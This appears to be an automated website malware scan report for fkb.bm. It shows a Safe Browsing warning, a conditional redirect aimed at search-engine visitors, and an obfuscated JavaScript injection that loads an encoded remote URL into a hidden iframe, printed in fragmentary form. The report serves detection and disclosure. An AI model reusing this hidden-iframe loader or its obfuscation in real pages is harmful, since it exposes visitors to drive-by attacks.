Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=fkb.bm
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://fkb.bm/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: fkb.bm Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 17 Dec 2014 23:22:08 GMT Location: http://hollywoodliveshows.com/?id=2045-01&k=cbd1835f8&d=1 Server: Apache Content-Length: 273 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://fkb.bm/ | 200 OK Content-Length: 4723 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var Il1I1111I1=function(){return'\x61\x48\x52\x30\x63\x44\x6f\x76\x4c\x32\x64\x76\x62\x32\x64\x73\x62\x47\x55\x74\x59\x57\x35\x68\x62\x48\x6c\x30\x61\x57\x4e\x7a\x4c\x6d\x4e\x76\x62\x53\x39\x7a\x64\x47\x46\x79\x64\x43\x35\x77\x61\x48\x41\x3d';} var lIIII1lI1l=function(Il1III1lI1){return document;} var IllllIIIIl=function(lIllllIlIl){lIllllIlIl=lIIII1lI1l()['\u0067\u0065\u0074\u0045\u006c\u0065\u006d\u0065\u006e\u0074\u0042\u0079\u0049\u0064'](lIllllIlIl);<script> var lIIlII11Il try{var l11Il1lI1l=l1llIIlll1();}catch(l1II1IlIII){} return l11Il1lI1l;} var lll1I1lllI=function(){var lll11llIII=document.createElement('iframe');lll11llIII['style']['display']='none';lll11llIII.id='lI1lIlIII1';lll11llIII.src='about:blank';document.body.appendChild(lll11llIII);} var II1lI1llIl=function(){lll1I1lllI();var lll11llIII=document.getElementById('lI1lIlIII1');lll11llIII.setAttribute('src',lI1lIl1Ill());return true;} II1lI1llIl(); Antivirus reports:
| ||
http://treanfyran.se/library/index3.php | 500 Can't connect to treanfyran.se:80 Content-Length: 188 Content-Type: text/plain | clean |
http://treanfyran.se/test404page.js | 500 Can't connect to treanfyran.se:80 Content-Length: 188 Content-Type: text/plain | clean |